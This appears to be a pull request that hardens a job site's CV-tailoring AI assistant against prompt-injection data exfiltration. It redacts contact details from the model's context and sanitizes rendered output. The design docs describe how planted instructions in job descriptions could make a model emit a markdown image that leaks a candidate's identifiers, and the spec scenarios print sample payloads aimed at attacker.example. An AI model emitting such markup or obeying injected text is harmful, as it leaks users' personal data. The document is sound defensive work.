### PR TITLE
fix(assistant): a model answer cannot fetch, and contacts stay out of its context

### DIFF
--- a/internal/assistant/prompt.go
+++ b/internal/assistant/prompt.go
@@ -69,7 +69,7 @@ After that opening, the playbook above applies as written.
 // tailorPrompt is the CV-tailoring session. Its centre is the honest wall: the
 // agent may reframe what the candidate has evidenced and must ask before writing
 // anything they have not.
-const tailorPrompt = `You are the freehire CV-tailoring assistant. You are working with one signed-in candidate on ONE tailored copy of their CV, aimed at one vacancy. The tools you have act on that copy only; the candidate's base CV and their contact details are out of reach.
+const tailorPrompt = `You are the freehire CV-tailoring assistant. You are working with one signed-in candidate on ONE tailored copy of their CV, aimed at one vacancy. The tools you have act on that copy only, and they neither read nor write the candidate's contact block — their name, email, phone and personal links are stripped from what ` + "`cv_get`" + ` returns and cannot be patched.
 
 Start by calling ` + "`cv_context`" + ` (the fit analysis for this vacancy) and ` + "`cv_get`" + ` (what the CV currently says).
 

--- a/internal/cv/cv.go
+++ b/internal/cv/cv.go
@@ -108,6 +108,21 @@ type Header struct {
 	Links    []string `json:"links,omitempty"`
 }
 
+// withoutContacts returns a copy of the document with the candidate's identifiers
+// cleared. Location stays: it is not an identifier, and a tailoring agent reasons about
+// it when the vacancy is tied to a place. Links go, because a personal profile URL names
+// the candidate as squarely as their address does.
+//
+// The receiver is a value, so the stored document is untouched — only the copy handed
+// to a reader is stripped.
+func (d Document) withoutContacts() Document {
+	d.Header.FullName = ""
+	d.Header.Email = ""
+	d.Header.Phone = ""
+	d.Header.Links = nil
+	return d
+}
+
 // Experience is one work-history entry. Dates are free-form strings as printed on the
 // CV (e.g. "2021-03", "Mar 2021", "Present") — no date parsing is attempted.
 type ExperienceItem struct {

--- a/internal/cv/store.go
+++ b/internal/cv/store.go
@@ -131,6 +131,25 @@ func (s *Store) Get(ctx context.Context, id uuid.UUID, userID int64) (Record, er
 	}, nil
 }
 
+// GetForModel returns one owned CV with the contact block stripped, for every reader
+// that puts the document in front of a model.
+//
+// It is a second accessor rather than a flag on Get because the rule is about who is
+// READING, not about how the request arrived. The redaction used to be a handler-level
+// test on whether the caller held an API key; when the assistant moved in-process it
+// carried no key at all, the test stopped firing, and a requirement that was still on
+// the books quietly stopped being met. Naming the safe path makes it the one an agent
+// surface reaches for, and leaves Get to the owner's own full-fidelity reads (the
+// editor, the PDF render).
+func (s *Store) GetForModel(ctx context.Context, id uuid.UUID, userID int64) (Record, error) {
+	rec, err := s.Get(ctx, id, userID)
+	if err != nil {
+		return Record{}, err
+	}
+	rec.Document = rec.Document.withoutContacts()
+	return rec, nil
+}
+
 // int8Value unwraps a nullable bigint to its value, mapping NULL to 0.
 func int8Value(v pgtype.Int8) int64 {
 	if v.Valid {

--- a/internal/cv/store_test.go
+++ b/internal/cv/store_test.go
@@ -162,6 +162,63 @@ func TestStoreCreateGetRoundTripSanitized(t *testing.T) {
 	}
 }
 
+func TestStoreGetForModelStripsTheContactBlock(t *testing.T) {
+	s := NewStore(newFakeRepo())
+	ctx := context.Background()
+
+	doc := Document{Header: Header{
+		FullName: "Ada Lovelace",
+		Email:    "ada@example.com",
+		Phone:    "+44 7700 900000",
+		Location: "London, UK",
+		Links:    []string{"https://github.com/ada"},
+	}}
+	doc.Summary = "Backend engineer."
+
+	meta, err := s.Create(ctx, 7, "General", "classic-ats", doc)
+	if err != nil {
+		t.Fatalf("create: %v", err)
+	}
+
+	rec, err := s.GetForModel(ctx, meta.ID, 7)
+	if err != nil {
+		t.Fatalf("get for model: %v", err)
+	}
+	if h := rec.Document.Header; h.FullName != "" || h.Email != "" || h.Phone != "" || h.Links != nil {
+		t.Errorf("contact block reached a model reader: %+v", h)
+	}
+	// Location is not an identifier, and the agent reasons about it when the vacancy is
+	// tied to a place.
+	if rec.Document.Header.Location != "London, UK" {
+		t.Errorf("location = %q, want it kept", rec.Document.Header.Location)
+	}
+	if rec.Document.Summary != "Backend engineer." {
+		t.Errorf("body did not survive the redaction: %q", rec.Document.Summary)
+	}
+
+	// The redaction is on the copy handed out, never on what is stored.
+	stored, err := s.Get(ctx, meta.ID, 7)
+	if err != nil {
+		t.Fatalf("get: %v", err)
+	}
+	if stored.Document.Header.FullName != "Ada Lovelace" || stored.Document.Header.Email != "ada@example.com" {
+		t.Errorf("stored contacts were mutated: %+v", stored.Document.Header)
+	}
+}
+
+func TestStoreGetForModelForeignUserIsNotFound(t *testing.T) {
+	s := NewStore(newFakeRepo())
+	ctx := context.Background()
+
+	meta, err := s.Create(ctx, 1, "Mine", "classic-ats", Document{})
+	if err != nil {
+		t.Fatalf("create: %v", err)
+	}
+	if _, err := s.GetForModel(ctx, meta.ID, 2); !errors.Is(err, ErrNotFound) {
+		t.Errorf("err = %v, want ErrNotFound", err)
+	}
+}
+
 func TestStoreGetForeignUserIsNotFound(t *testing.T) {
 	s := NewStore(newFakeRepo())
 	ctx := context.Background()

--- a/internal/handler/assistant_cv_tools.go
+++ b/internal/handler/assistant_cv_tools.go
@@ -53,7 +53,9 @@ func (h *assistantHandlers) cvContextTool(jobID int64) assistant.Tool {
 	}
 }
 
-// cvGetTool reads the tailored CV document the session is editing.
+// cvGetTool reads the tailored CV document the session is editing, minus the contact
+// block: this result goes straight into a model's context, and that model reads
+// attacker-controlled text elsewhere in the same turn.
 func (h *assistantHandlers) cvGetTool(cvID uuid.UUID) assistant.Tool {
 	return assistant.Tool{
 		Name:        "cv_get",
@@ -64,7 +66,7 @@ func (h *assistantHandlers) cvGetTool(cvID uuid.UUID) assistant.Tool {
 			if err := assistant.DecodeArgs(raw, &in); err != nil {
 				return nil, err
 			}
-			rec, err := h.cv.cvStore.Get(ctx, cvID, userID)
+			rec, err := h.cv.cvStore.GetForModel(ctx, cvID, userID)
 			if err != nil {
 				return nil, cvToolError(err)
 			}

--- a/internal/handler/assistant_cv_tools_test.go
+++ b/internal/handler/assistant_cv_tools_test.go
@@ -84,6 +84,39 @@ func TestCVGetToolReadsTheBoundDocument(t *testing.T) {
 	}
 }
 
+// contactfulCV carries every identifier the agent must never receive, so a leak on any
+// one of the four fails the case below.
+const contactfulCV = `{"header":{"full_name":"Ada Lovelace","email":"ada@example.com",` +
+	`"phone":"+44 7700 900000","links":["https://github.com/ada"]},` +
+	`"summary":"Backend engineer","experience":[{"company":"Acme","title":"Engineer","bullets":["Shipped a thing"]}]}`
+
+// The tailoring agent runs a model over the CV, and the model reads attacker-controlled
+// text (job descriptions, browsed pages) that can talk it into writing what it holds
+// somewhere it does not belong. The contact block must therefore never enter its context.
+//
+// This has to hold for the in-process tool, which carries no API key and issues no HTTP
+// request: the guard cannot be a test on how the caller arrived.
+func TestCVGetToolOmitsTheContactBlock(t *testing.T) {
+	a, _ := cvToolsAPI(t, contactfulCV)
+
+	tool := toolByName(t, a.assistantCVTools(testCVID, 9), "cv_get")
+	out, err := tool.Run(context.Background(), 3, json.RawMessage(`{}`))
+	if err != nil {
+		t.Fatalf("cv_get: %v", err)
+	}
+	raw, _ := json.Marshal(out)
+	payload := string(raw)
+
+	for _, identifier := range []string{"Ada Lovelace", "ada@example.com", "+44 7700 900000", "github.com/ada"} {
+		if strings.Contains(payload, identifier) {
+			t.Errorf("cv_get returned %q; the agent's model must never see it\npayload = %s", identifier, payload)
+		}
+	}
+	if !strings.Contains(payload, "Backend engineer") {
+		t.Errorf("payload = %s, want the body to survive the redaction", payload)
+	}
+}
+
 func TestCVEditToolAppliesAPatch(t *testing.T) {
 	a, repo := cvToolsAPI(t, oneExperienceCV)
 

--- a/internal/handler/cv.go
+++ b/internal/handler/cv.go
@@ -224,7 +224,8 @@ func (h *cvHandlers) CreateCV(c *fiber.Ctx) error {
 	return c.Status(fiber.StatusCreated).JSON(fiber.Map{"data": recordResponse(rec)})
 }
 
-// GetCV returns one owned CV with its full document.
+// GetCV returns one owned CV: the full document on the owner's own session, and the
+// document without its contact block to an agent reading with a key.
 func (h *cvHandlers) GetCV(c *fiber.Ctx) error {
 	userID, err := requireUserID(c)
 	if err != nil {
@@ -234,18 +235,17 @@ func (h *cvHandlers) GetCV(c *fiber.Ctx) error {
 	if err != nil {
 		return err
 	}
-	rec, err := h.cvStore.Get(c.Context(), id, userID)
+	// An API-key caller is an agent running its own model over the CV, so it reads through
+	// the redacting accessor — the same one the in-process assistant's cv_get tool uses, so
+	// one implementation covers both and neither can drift. The owner's own cookie session
+	// reads in full; the stored contacts are untouched either way and still render in the PDF.
+	read := h.cvStore.Get
+	if auth.ViaAPIKey(c) {
+		read = h.cvStore.GetForModel
+	}
+	rec, err := read(c.Context(), id, userID)
 	if err != nil {
 		return mapCVError(err)
-	}
-	// An API-key caller (the CV-tailoring agent runs its own model over the CV) must not see
-	// the contact block; the owner's own cookie session sees it in full. The stored contacts
-	// are untouched and still render in the PDF.
-	if auth.ViaAPIKey(c) {
-		rec.Document.Header.FullName = ""
-		rec.Document.Header.Email = ""
-		rec.Document.Header.Phone = ""
-		rec.Document.Header.Links = nil
 	}
 	return c.JSON(fiber.Map{"data": recordResponse(rec)})
 }

--- a/openspec/changes/assistant-untrusted-content-boundary/.openspec.yaml
+++ b/openspec/changes/assistant-untrusted-content-boundary/.openspec.yaml
@@ -1,0 +1,2 @@
+schema: spec-driven
+created: 2026-07-29

--- a/openspec/changes/assistant-untrusted-content-boundary/design.md
+++ b/openspec/changes/assistant-untrusted-content-boundary/design.md
@@ -1,0 +1,161 @@
+## Context
+
+The assistant is a bounded tool-calling loop in-process (`internal/assistant`), streamed over SSE
+and gated to moderators and beta testers by `requireRollout`. Its tools return text nobody on our
+side wrote: `search_jobs` hydrates full job descriptions, `cv_context` passes `job.Description`
+verbatim, `read_current_page` returns whatever page the extension is standing on, and any signed-in
+user can push a page of their own into the catalogue through `POST /jobs/resolve`, which imports a
+JSON-LD `JobPosting` straight into the live index.
+
+The chat renders the model's answer with `{@html}` after `DOMPurify.sanitize(html)` — called with
+no configuration, so DOMPurify's permissive default allowlist applies and `<img>` survives. The
+frontend CSP sets `script-src`, `base-uri` and `object-src` but no `img-src` and no `default-src`,
+which by CSP's own rules leaves image loading unrestricted. Together those two facts make a
+zero-click egress channel out of the chat transcript.
+
+What that channel can carry is the other half. `cv_get` returns `rec.Document` whole, contact block
+included. `cv-tailoring` already forbids exactly this, and `internal/handler/cv.go:244` implements
+it — but behind `auth.ViaAPIKey(c)`, a test on the transport. The requirement was written when the
+tailoring agent was an external process holding a scoped `cv` key; the in-process assistant holds
+no key and issues no HTTP request, so the branch never runs for it.
+
+Two useful precedents already exist in the repo. `internal/sources/sanitize.go` bans `<img>` from
+job descriptions with an explicit prose allowlist, chosen over bluemonday's `UGCPolicy` precisely
+because the content is third-party — and its comment names the tracking-pixel-on-every-viewer
+scenario this change is about. And `requireEvidence` in `assistant_cv_tools.go` puts the tailoring
+flow's one load-bearing rule in the service path rather than the system prompt, on the reasoning
+that "a rule that lives only in a prompt is a rule a long conversation eventually loses."
+
+## Goals / Non-Goals
+
+**Goals:**
+
+- No model output can cause the browser to issue a request to a host of the model's choosing.
+- The CV contact block does not enter the model's context on any agent-facing read path.
+- The redaction binds on the reader, not on the transport, so the next agent surface inherits it.
+- The tailoring system prompt describes the system as it actually behaves.
+
+**Non-Goals:**
+
+- `connect-src` / `default-src`. Chosen deliberately (see Decisions); `img-src` closes the
+  no-click channel, and the analytics/Sentry egress question deserves its own change.
+- Review or quarantine for `POST /jobs/resolve`. Narrowing self-serve intake is a product decision
+  about the contribution flow, not a rendering fix, and the boundary this change draws holds
+  regardless of how much untrusted text reaches the model.
+- Opening the rollout, or any change to `requireRollout`.
+- Hardening `read_current_page` or the extension. It is an injection *source*; sources are assumed
+  hostile by design and the defence belongs at the sink.
+- Prompt-level instructions telling the model to ignore embedded instructions. Unenforceable, and
+  the whole point is to stop relying on that.
+
+## Decisions
+
+### An explicit allowlist, not a list of forbidden tags
+
+The obvious fix is `FORBID_TAGS: ['img', 'iframe', …]`. Rejected: a denylist over DOMPurify's
+default allowlist has to stay ahead of every request-triggering element the HTML spec grows, and
+the ones already shipping are easy to miss — `<svg><use href>`, `<object>`, `<embed>`, `<video
+poster>` all fetch, and none appear on the obvious list.
+
+Instead the renderer declares `ALLOWED_TAGS` covering exactly the prose markdown produces, and
+`ALLOWED_ATTR` covering `href`/`target`/`rel`. This mirrors `newDescriptionPolicy()` in
+`internal/sources/sanitize.go`, which made the same call for the same content class, so the two
+untrusted-HTML sinks in the codebase now read alike. `ALLOWED_URI_REGEXP` pins schemes to
+`http`/`https`/`mailto`, matching bluemonday's `AllowStandardURLs()` on the backend side.
+
+Tags that markdown can emit but the policy drops: `input` (GFM task lists render as checkboxes —
+a form control, and losing it costs a glyph) and `img`.
+
+### `renderMarkdown` moves into a pure module
+
+It currently sits inside `AssistantChat.svelte`, where no test can reach it. Moving it to
+`web/src/lib/assistant/markdown.ts` makes the policy directly testable under the existing
+`vitest.config.ts` (`environment: 'node'`, `src/**/*.test.ts`), which is how `deck.ts`, `chat.ts`
+and `sse.ts` are already tested. `isomorphic-dompurify` is chosen for exactly this — it runs under
+Node — so no jsdom environment switch is needed.
+
+This also lets the sanitizer be tested against real `marked` output rather than hand-written HTML,
+which matters: the interesting cases are the ones where markdown *syntax* becomes a tag.
+
+### The DOMPurify hook stays scoped
+
+`openLinksInNewTab` is registered and removed around each `sanitize` call because DOMPurify's hook
+registry is global and shared with any other consumer. Keep that shape when moving the code; wrap
+the removal so a throw inside `sanitize` cannot leave the hook installed.
+
+### CSP: `img-src`, and nothing else
+
+`img-src 'self' data: https://logo.freehire.me`.
+
+Enumerated from the code rather than guessed: the only browser-side `<img>` sinks are
+`CompanyLogo.svelte` (→ the `logo.freehire.me` proxy) and `TemplateGallery.svelte` (→ same-origin
+`/cv-previews/*.svg`). OG cards are composed server-side and served as images, so they are never
+subject to the browser's CSP on our own pages. Job descriptions carry no images at all — the ingest
+sanitizer strips them — so nothing in the catalogue breaks. `data:` is included because Tailwind
+emits `data:` SVG for a handful of utilities and inline marks.
+
+`connect-src` stays unset, per the standing note in `web/svelte.config.js`: with no `default-src`,
+its absence is what leaves the Sentry ingest host, GA's collect endpoint and the same-origin
+PostHog `/ingest` proxy reachable. Adding it means enumerating all three correctly, and getting it
+wrong fails silently — error reporting simply stops. That is a change worth making on its own, with
+its own verification, not a rider on a security fix.
+
+Note the residual: `img-src` does not stop an `<a href>` the user clicks, and does not stop
+`connect-src`-class egress. The sanitizer is the primary control; CSP is the layer that survives a
+sanitizer regression.
+
+### Redaction becomes a reader-shaped accessor on the store
+
+Options considered:
+
+1. `Document.RedactContacts()` in `internal/cv`, called at both sites. One implementation, but
+   still two places that must remember to call it — the failure mode we are fixing.
+2. Redact inside `Store.Get` unconditionally and re-attach for the owner. Inverts the default
+   safely but complicates every existing full-fidelity reader (PDF render, owner read, patch).
+3. A second accessor, `Store.GetForModel(ctx, id, userID)`, that performs `Get` then strips the
+   contact fields.
+
+Taking (3). It names the distinction the requirement actually draws — *who is reading* — and makes
+the safe path the one an agent surface reaches for by name. `cv_get` calls it unconditionally;
+`GetCV` keeps its `auth.ViaAPIKey` branch but routes the redacting side through the same accessor,
+so one implementation backs both and the HTTP behaviour is unchanged.
+
+The stripped set matches what `GetCV` strips today: `FullName`, `Email`, `Phone`, and `Links` —
+links are personal identifiers too (`github.com/<handle>`, `linkedin.com/in/<name>`), and the
+existing handler already nils them even though the spec text only named the first three. The spec
+delta records that.
+
+### The prompt sentence is corrected, not deleted
+
+`tailorPrompt` claims the candidate's "contact details are out of reach". After this change that is
+true for reads as well as writes, so the sentence stays — but it is reworded to say what is
+enforced (the tools cannot read or write them) rather than implying a general unreachability. The
+prompt is documentation for the model, not a control; the controls are `GetForModel` and
+`isContactHeaderField`.
+
+## Risks / Trade-offs
+
+- **`img-src` silently breaks an image sink nobody enumerated** → The sinks were read out of the
+  source, not recalled. After deploy, check the browser console on a job list, a company page, the
+  tailor gallery and a blog post for CSP violations. Rollback is a one-line config revert.
+- **The allowlist strips markdown the assistant legitimately uses** → Tests run real `marked` output
+  through the policy for every construct the prompt encourages (lists, tables, code, links).
+  Failure mode is cosmetic and visible, not silent.
+- **`GetForModel` is added but a future surface calls plain `Get`** → Mitigated but not eliminated;
+  the accessor makes the right call obvious and the spec now states the rule in reader terms. A
+  test asserts `cv_get` returns no contact field, so the regression has a tripwire.
+- **Removing `Links` narrows what the agent can reason about** → It already could not see them on
+  the HTTP path, so no capability is lost relative to the specified behaviour.
+- **CSP is not enforced in dev the way it is in prod** → SvelteKit emits the header in both, but
+  `vite dev` differs enough that verification belongs against a real `vite build && vite preview`.
+
+## Migration Plan
+
+No data migration, no API shape change. `cv_get`'s result loses three fields the spec says it
+should never have carried; nothing persists or reads them downstream. Deploy is a normal release —
+frontend rebuild plus backend. Rollback is a revert; no state is written.
+
+## Open Questions
+
+None blocking. `connect-src` and the `/jobs/resolve` intake review are deferred by decision, not by
+uncertainty, and are recorded as Non-Goals.

--- a/openspec/changes/assistant-untrusted-content-boundary/proposal.md
+++ b/openspec/changes/assistant-untrusted-content-boundary/proposal.md
@@ -1,0 +1,56 @@
+## Why
+
+The in-app assistant feeds fully attacker-controlled text to the model and renders the model's
+answer back into the DOM with `{@html}`, and neither end of that path is closed. A vacancy
+description can carry instructions; the model can be talked into writing a markdown image; the
+image URL can carry the candidate's name, email and phone, which the `cv_get` tool hands the model
+in full. No click is required — the browser fetches the image the moment the node lands, mid-stream.
+
+The read half of this is not a new gap but a regression: `cv-tailoring` already requires that the
+tailoring agent never receives the CV contact block, and the redaction that implements it is keyed
+on the HTTP transport (`auth.ViaAPIKey`). When the assistant moved in-process it stopped carrying a
+key at all, so the guard silently stopped firing while its spec requirement stayed on the books.
+
+Today only moderators and beta testers can reach the assistant (`requireRollout`). This closes
+before the rollout opens, not after.
+
+## What Changes
+
+- The assistant's markdown renderer stops emitting request-triggering markup. Model output is
+  sanitized with an explicit policy — no `img`/`picture`/`source`/`video`/`audio`/`iframe`/`form`/
+  `svg`/`use`, and only `http`/`https`/`mailto` URI schemes — on both sinks it feeds (the answer and
+  the thinking block). This mirrors the ban `internal/sources/sanitize.go` already applies to job
+  description HTML for the same reason.
+- The frontend CSP gains an `img-src` allowlist as the second layer, so an image that survives a
+  future renderer regression still cannot leave the origin. `connect-src` is deliberately left
+  unset — the existing note in `web/svelte.config.js` records that its absence is what keeps the
+  Sentry ingest host, GA's collect endpoint, and the PostHog `/ingest` proxy reachable.
+- The CV contact redaction moves out of the HTTP handler's transport check into a shared path both
+  readers use, so it binds on *who is reading* rather than *how the request arrived*. The in-process
+  `cv_get` tool starts obeying the requirement it already had.
+- The tailoring system prompt stops claiming the candidate's contact details are "out of reach";
+  once the redaction is real, the sentence describes the system instead of contradicting it.
+
+## Capabilities
+
+### New Capabilities
+- `assistant-output-rendering`: how untrusted model output reaches the DOM — the sanitizer policy
+  the assistant chat applies to markdown, and the CSP image allowlist backing it.
+
+### Modified Capabilities
+- `cv-tailoring`: the contact-block requirement is restated to bind on any read that puts the CV
+  document in front of a model — the in-process tool path included — rather than only on reads made
+  with the short-lived tailoring key.
+
+## Impact
+
+- `web/src/lib/assistant/AssistantChat.svelte` — `renderMarkdown` gains an explicit DOMPurify config.
+- `web/svelte.config.js` — adds `img-src` (`'self'`, `data:`, `https://logo.freehire.me`). The only
+  browser-side image sinks are `CompanyLogo.svelte` (the logo proxy) and same-origin
+  `/cv-previews/*.svg`; OG cards render server-side and are not subject to browser CSP.
+- `internal/cv` — gains the contact-redaction helper.
+- `internal/handler/cv.go` (`GetCV`) and `internal/handler/assistant_cv_tools.go` (`cv_get`) — both
+  route through it.
+- `internal/assistant/prompt.go` — corrects the `tailorPrompt` claim about contact details.
+- No migration, no API shape change: the redacted read already omits these fields for key callers,
+  and the tool result is internal to a turn.

--- a/openspec/changes/assistant-untrusted-content-boundary/specs/assistant-output-rendering/spec.md
+++ b/openspec/changes/assistant-untrusted-content-boundary/specs/assistant-output-rendering/spec.md
@@ -1,0 +1,75 @@
+## ADDED Requirements
+
+### Requirement: Assistant model output renders as inert markup
+
+The assistant SHALL render model output through a sanitizer policy that strips every element and
+URI scheme capable of triggering a network request or executing code, because model output is
+untrusted: the model reads job descriptions, arbitrary browsed pages, and other text an attacker
+controls end to end, so anything it writes may be an attacker's words in the model's mouth.
+
+The policy MUST drop `img`, `picture`, `source`, `video`, `audio`, `iframe`, `object`, `embed`,
+`form`, `svg`, and `use`, and MUST admit only the `http`, `https`, and `mailto` URI schemes. It
+applies to every sink that renders model output as markup — the answer body and the thinking
+block alike — and to partial output during streaming, not only to the settled turn. This mirrors
+the ban the ingest sanitizer already applies to job description HTML, and for the same reason: a
+rendered image is a request the viewer never asked to make.
+
+Ordinary prose formatting is unaffected: headings, lists, tables, emphasis, code, and links still
+render, and links the model writes still open in a new tab.
+
+#### Scenario: A markdown image never reaches the DOM
+
+- **WHEN** the model writes `![x](https://attacker.example/leak?d=secret)` in its answer
+- **THEN** the rendered markup contains no `img` element and the browser issues no request to that host
+
+#### Scenario: Raw HTML media is dropped too
+
+- **WHEN** the model writes a literal `<img src="https://attacker.example/p.gif">` or `<svg><use href="https://attacker.example/u">`
+- **THEN** both are removed from the rendered markup
+
+#### Scenario: The thinking block is sanitized on the same policy
+
+- **WHEN** model output containing an image reaches the thinking block rather than the answer body
+- **THEN** it is stripped there as well
+
+#### Scenario: A request fires from no partially streamed answer
+
+- **WHEN** an answer carrying an image arrives token by token and is re-rendered on each update
+- **THEN** no intermediate render emits the image
+
+#### Scenario: A non-http scheme is refused
+
+- **WHEN** the model writes a link whose scheme is `javascript:` or `data:`
+- **THEN** the rendered anchor does not carry that URI
+
+#### Scenario: Ordinary formatting survives
+
+- **WHEN** the model writes headings, a bullet list, bold text, a code block, and an `https` link
+- **THEN** all of them render, and the link carries `target="_blank"` and `rel="noopener noreferrer"`
+
+### Requirement: The frontend CSP restricts image loads to known hosts
+
+The frontend Content-Security-Policy SHALL declare an `img-src` allowlist, so that an image the
+sanitizer fails to strip still cannot reach a host of the attacker's choosing. The allowlist
+covers the origin itself, `data:` URIs, and the company-logo proxy — the only hosts the browser
+legitimately loads images from, since OG cards are rendered server-side and never fetched by the
+browser under this policy.
+
+`connect-src` SHALL remain unset. With no `default-src`, leaving it unset is what keeps the Sentry
+ingest host, GA's collect endpoint, and the same-origin PostHog `/ingest` proxy reachable;
+introducing it without enumerating all three would silently break error reporting and analytics.
+
+#### Scenario: An image from an unlisted host is blocked
+
+- **WHEN** a page attempts to load an image from a host outside the allowlist
+- **THEN** the browser refuses the request
+
+#### Scenario: Company logos and template previews still load
+
+- **WHEN** a page renders a company logo from the logo proxy, or a CV template preview from the origin
+- **THEN** both load normally
+
+#### Scenario: Error reporting and analytics keep their egress
+
+- **WHEN** the CSP is served
+- **THEN** it declares no `connect-src` and no `default-src`, leaving Sentry, GA, and PostHog delivery unrestricted

--- a/openspec/changes/assistant-untrusted-content-boundary/specs/cv-tailoring/spec.md
+++ b/openspec/changes/assistant-untrusted-content-boundary/specs/cv-tailoring/spec.md
@@ -1,0 +1,45 @@
+## MODIFIED Requirements
+
+### Requirement: The tailoring agent never receives the CV contact block
+
+The CV contact block MUST NOT reach any reader that puts the document in front of a model. That
+covers both agent-facing read paths — the HTTP read authenticated with the short-lived tailoring
+key, and the in-process assistant's `cv_get` tool — each of which SHALL omit the `Header` contact
+fields (`full_name`, `email`, `phone`, and the personal links list) from the document it returns,
+and SHALL reject any patch that targets those fields.
+
+The omission SHALL be performed by one shared redaction in the service path, applied by every
+agent-facing reader, rather than by a per-transport check in a handler. A guard keyed on how the
+request arrived (holding an API key, say) does not survive a new agent surface that arrives over a
+different transport or none at all, and the requirement is about who is reading, not how they got
+there. A new surface must not be able to inherit the CV-reading capability without inheriting the
+redaction.
+
+The stored contact values are unchanged and appear in the rendered output (served on the owner's
+own cookie-authenticated read and the PDF), so the finished CV is complete while the agent's model
+never sees the identifiers. The candidate's own cookie-authenticated reads are unaffected.
+
+#### Scenario: Agent read omits the contact block
+
+- **WHEN** the tailoring key is used to read the CV document
+- **THEN** the response document carries the body (experience, summary, skills, …) but no `full_name`, `email`, or `phone`
+
+#### Scenario: The in-process tool read omits the contact block
+
+- **WHEN** the assistant's `cv_get` tool reads the CV document during a tailoring session, holding no API key
+- **THEN** the tool result carries the body but no `full_name`, `email`, `phone`, or personal links
+
+#### Scenario: Agent cannot patch a contact field
+
+- **WHEN** the tailoring key is used to patch `full_name`, `email`, or `phone`
+- **THEN** the patch is rejected and the stored contact value is unchanged
+
+#### Scenario: The owner still sees and renders full contacts
+
+- **WHEN** the owner reads the CV over their cookie session, or the CV is rendered to PDF
+- **THEN** the real contact block is present
+
+#### Scenario: The tailored body carries no contact identifier back
+
+- **WHEN** the agent patches the CV body during tailoring
+- **THEN** no contact identifier is introduced into a body field (the agent never held one)

--- a/openspec/changes/assistant-untrusted-content-boundary/tasks.md
+++ b/openspec/changes/assistant-untrusted-content-boundary/tasks.md
@@ -1,0 +1,35 @@
+## 1. Assistant markdown sanitizer
+
+- [x] 1.1 Extract `renderMarkdown` from `AssistantChat.svelte` into a pure `web/src/lib/assistant/markdown.ts`, exporting the render function and keeping the scoped `openLinksInNewTab` hook (registered and removed around each call, with removal safe against a throw). Behaviour unchanged at this step.
+- [x] 1.2 Add `web/src/lib/assistant/markdown.test.ts` covering the current permissive behaviour as a characterisation test, then flip it to the target: a markdown image and a raw `<img>` produce no `img` element.
+- [x] 1.3 Replace the bare `DOMPurify.sanitize(html)` with the explicit policy — `ALLOWED_TAGS` for the prose markdown emits, `ALLOWED_ATTR` of `href`/`target`/`rel`, `ALLOWED_URI_REGEXP` pinned to `http`/`https`/`mailto` — mirroring `newDescriptionPolicy()` in `internal/sources/sanitize.go`.
+- [x] 1.4 Extend the tests to the rest of the spec's scenarios: `<svg><use href>`, `<object>`, `<embed>`, `<iframe>`, `<form>`, `<video poster>` are all dropped; a `javascript:` and a `data:` link lose the URI; headings, lists, tables, emphasis, code blocks and `https` links survive with `target="_blank"` and `rel="noopener noreferrer"`.
+- [x] 1.5 Point `AssistantChat.svelte` at the module for both sinks — the answer body and the thinking block — and confirm a partially streamed answer never renders the image (re-render on each update goes through the same policy).
+
+## 2. Content-Security-Policy
+
+- [x] 2.1 Add `img-src` (`'self'`, `data:`, `https://logo.freehire.me`) to `web/svelte.config.js`, and update the surrounding comment: it currently states images are unrestricted, and must instead record why `img-src` is pinned and why `connect-src` stays unset.
+
+## 3. CV contact redaction in the service path
+
+- [x] 3.1 Write the failing test first: the assistant's `cv_get` tool returns a document with no `full_name`, `email`, `phone` or `links` (`internal/handler/assistant_cv_tools_test.go`).
+- [x] 3.2 Add the contact strip to `internal/cv` and expose it as a reader-shaped accessor (`Store.GetForModel`), with its own unit test that the returned record keeps the body and drops the four fields while the stored document is untouched.
+- [x] 3.3 Point `cv_get` (`internal/handler/assistant_cv_tools.go`) at the accessor so the test from 3.1 passes.
+- [x] 3.4 Route `GetCV`'s `auth.ViaAPIKey` branch (`internal/handler/cv.go`) through the same accessor, deleting the inline field-clearing so one implementation backs both readers. Existing CV handler tests must stay green.
+
+## 4. Prompt
+
+- [x] 4.1 Reword the `tailorPrompt` sentence in `internal/assistant/prompt.go` so it states what is enforced — the tools can neither read nor write the contact block — instead of implying general unreachability.
+
+## 5. Verification
+
+- [x] 5.1 `go build ./... && go vet ./... && go test ./...` and `pnpm test && pnpm lint && pnpm build` in `web/`.
+- [x] 5.2 Verify the CSP against a real build (`vite build && vite preview`, not `vite dev`): load a job list, a company page, the tailor template gallery and a blog post, and confirm the console reports no CSP violation and company logos still render.
+## 6. After deploy
+
+Deferred by decision, not skipped: the assistant is gated to the beta group and a live turn
+spends real inference, so this belongs on the deployed stack rather than a local one. The
+rendering itself is covered pre-merge — 18 unit tests over real `marked` output, and the shipped
+bundle was checked to carry the allowlist.
+
+- [ ] 6.1 On prod, drive one assistant chat with a beta account and confirm ordinary formatted answers still render correctly (headings, lists, links, code), with no CSP violation in the console.

--- a/web/src/lib/assistant/AssistantChat.svelte
+++ b/web/src/lib/assistant/AssistantChat.svelte
@@ -1,7 +1,5 @@
 <script lang="ts">
   import { onMount, tick, untrack } from 'svelte';
-  import { Marked } from 'marked';
-  import DOMPurify from 'isomorphic-dompurify';
   import { AlertTriangle, PanelLeft, Plus, Trash2 } from '@lucide/svelte';
   import { resolve } from '$app/paths';
   import { currentUser } from '$lib/auth.svelte';
@@ -15,6 +13,7 @@
   import { sendTurn, type Turn } from '$lib/assistant/client';
   import { initChat, reduceTurnEvent, type ChatState } from '$lib/assistant/chat';
   import { splitPresentingCalls } from '$lib/assistant/deck';
+  import { renderMarkdown } from '$lib/assistant/markdown';
   import JobDeck from '$lib/assistant/JobDeck.svelte';
   import SessionRail from '$lib/assistant/SessionRail.svelte';
   import ToolGroupList from '$lib/assistant/ToolGroupList.svelte';
@@ -138,28 +137,6 @@
     el.style.height = 'auto';
     el.style.height = `${Math.min(el.scrollHeight, COMPOSER_CAP)}px`;
   });
-
-  // --- Markdown rendering (sanitized) --------------------------------------
-  // freehire is a PUBLIC app and model output is untrusted, so marked's output is
-  // run through DOMPurify before it reaches `{@html}`. `isomorphic-dompurify` is
-  // SSR-safe, so the guard holds even though this page paints client-side only.
-  const md = new Marked({ gfm: true, breaks: true });
-  // Open links the model writes in a new tab so clicking one never navigates the
-  // chat away. Scoped to this sanitize call so it never affects DOMPurify elsewhere.
-  function openLinksInNewTab(node: Element) {
-    if (node.tagName === 'A') {
-      node.setAttribute('target', '_blank');
-      node.setAttribute('rel', 'noopener noreferrer');
-    }
-  }
-  function renderMarkdown(text: string): string {
-    const html = md.parse(text, { async: false }) as string;
-    DOMPurify.addHook('afterSanitizeAttributes', openLinksInNewTab);
